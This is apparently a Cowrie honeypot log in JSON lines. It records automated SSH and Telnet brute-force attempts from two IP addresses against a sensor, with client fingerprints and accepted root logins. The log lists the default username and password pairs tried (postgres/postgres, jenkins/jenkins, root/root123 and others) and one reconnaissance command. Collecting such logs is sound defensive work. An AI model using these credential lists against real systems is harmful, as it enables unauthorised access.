{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:50.116673Z","src_ip":"212.227.125.160","session":"0eeb598246be"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:51.336488Z","src_ip":"212.227.125.160","session":"0eeb598246be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53796,"dst_ip":"1.2.3.4","dst_port":22,"session":"037a1275d0a9","protocol":"ssh","message":"New connection: 212.227.235.229:53796 (1.2.3.4:22) [session: 037a1275d0a9]","sensor":"my-vps","timestamp":"2025-08-28T06:47:55.181773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:55.182909Z","src_ip":"212.227.235.229","session":"037a1275d0a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:55.446237Z","src_ip":"212.227.235.229","session":"037a1275d0a9"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:56.239580Z","src_ip":"212.227.235.229","session":"037a1275d0a9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:57.505357Z","src_ip":"212.227.235.229","session":"037a1275d0a9"}
{"eventid":"cowrie.session.closed","duration":15.49487829208374,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:59.252267Z","src_ip":"212.227.125.160","session":"af9ad27d697e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40698,"dst_ip":"1.2.3.4","dst_port":23,"session":"bde5a4a94f93","protocol":"telnet","message":"New connection: 212.227.125.160:40698 (1.2.3.4:23) [session: bde5a4a94f93]","sensor":"my-vps","timestamp":"2025-08-28T06:48:04.919037Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44372,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5b44c5f643b","protocol":"ssh","message":"New connection: 212.227.125.160:44372 (1.2.3.4:22) [session: a5b44c5f643b]","sensor":"my-vps","timestamp":"2025-08-28T06:48:05.115021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:05.116021Z","src_ip":"212.227.125.160","session":"a5b44c5f643b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:05.334266Z","src_ip":"212.227.125.160","session":"a5b44c5f643b"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:06.035573Z","src_ip":"212.227.125.160","session":"a5b44c5f643b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:07.257361Z","src_ip":"212.227.125.160","session":"a5b44c5f643b"}
{"eventid":"cowrie.session.closed","duration":4.013513803482056,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:08.932459Z","src_ip":"212.227.125.160","session":"bde5a4a94f93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37506,"dst_ip":"1.2.3.4","dst_port":22,"session":"26c7624d7401","protocol":"ssh","message":"New connection: 212.227.235.229:37506 (1.2.3.4:22) [session: 26c7624d7401]","sensor":"my-vps","timestamp":"2025-08-28T06:48:11.718070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:11.718850Z","src_ip":"212.227.235.229","session":"26c7624d7401"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:11.976654Z","src_ip":"212.227.235.229","session":"26c7624d7401"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:12.755171Z","src_ip":"212.227.235.229","session":"26c7624d7401"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48138,"dst_ip":"1.2.3.4","dst_port":23,"session":"58a178206159","protocol":"telnet","message":"New connection: 212.227.125.160:48138 (1.2.3.4:23) [session: 58a178206159]","sensor":"my-vps","timestamp":"2025-08-28T06:48:13.985883Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:14.017276Z","src_ip":"212.227.235.229","session":"26c7624d7401"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39974,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d19d22ed871","protocol":"ssh","message":"New connection: 212.227.125.160:39974 (1.2.3.4:22) [session: 9d19d22ed871]","sensor":"my-vps","timestamp":"2025-08-28T06:48:21.508964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:21.509823Z","src_ip":"212.227.125.160","session":"9d19d22ed871"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:21.739799Z","src_ip":"212.227.125.160","session":"9d19d22ed871"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:22.670837Z","src_ip":"212.227.125.160","session":"9d19d22ed871"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:23.895170Z","src_ip":"212.227.125.160","session":"9d19d22ed871"}
{"eventid":"cowrie.session.closed","duration":10.551736831665039,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:24.537544Z","src_ip":"212.227.125.160","session":"58a178206159"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56524,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a62d64e6080","protocol":"ssh","message":"New connection: 212.227.235.229:56524 (1.2.3.4:22) [session: 7a62d64e6080]","sensor":"my-vps","timestamp":"2025-08-28T06:48:28.123876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:28.124823Z","src_ip":"212.227.235.229","session":"7a62d64e6080"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:28.375406Z","src_ip":"212.227.235.229","session":"7a62d64e6080"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:29.129782Z","src_ip":"212.227.235.229","session":"7a62d64e6080"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:30.382517Z","src_ip":"212.227.235.229","session":"7a62d64e6080"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46128,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0cc4ae695d3","protocol":"ssh","message":"New connection: 212.227.125.160:46128 (1.2.3.4:22) [session: c0cc4ae695d3]","sensor":"my-vps","timestamp":"2025-08-28T06:48:38.049286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:38.053571Z","src_ip":"212.227.125.160","session":"c0cc4ae695d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:38.267566Z","src_ip":"212.227.125.160","session":"c0cc4ae695d3"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:39.139558Z","src_ip":"212.227.125.160","session":"c0cc4ae695d3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:40.359638Z","src_ip":"212.227.125.160","session":"c0cc4ae695d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36624,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3bf6b1fffbb","protocol":"ssh","message":"New connection: 212.227.235.229:36624 (1.2.3.4:22) [session: e3bf6b1fffbb]","sensor":"my-vps","timestamp":"2025-08-28T06:48:44.589970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:44.591343Z","src_ip":"212.227.235.229","session":"e3bf6b1fffbb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:44.843410Z","src_ip":"212.227.235.229","session":"e3bf6b1fffbb"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T06:48:45.601871Z","src_ip":"212.227.235.229","session":"e3bf6b1fffbb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:46.856168Z","src_ip":"212.227.235.229","session":"e3bf6b1fffbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54548,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dea9daebedf","protocol":"ssh","message":"New connection: 212.227.125.160:54548 (1.2.3.4:22) [session: 7dea9daebedf]","sensor":"my-vps","timestamp":"2025-08-28T06:48:54.447904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:48:54.454171Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:48:54.664582Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:48:56.169134Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:48:56.684942Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:48:56.685684Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:57.389610Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:48:57.390762Z","src_ip":"212.227.125.160","session":"7dea9daebedf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35022,"dst_ip":"1.2.3.4","dst_port":22,"session":"429deb27b502","protocol":"ssh","message":"New connection: 212.227.235.229:35022 (1.2.3.4:22) [session: 429deb27b502]","sensor":"my-vps","timestamp":"2025-08-28T06:49:01.119892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:49:01.120998Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:49:01.383700Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:49:02.176469Z","src_ip":"212.227.235.229","session":"429deb27b502"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:49:02.804950Z","src_ip":"212.227.235.229","session":"429deb27b502"}
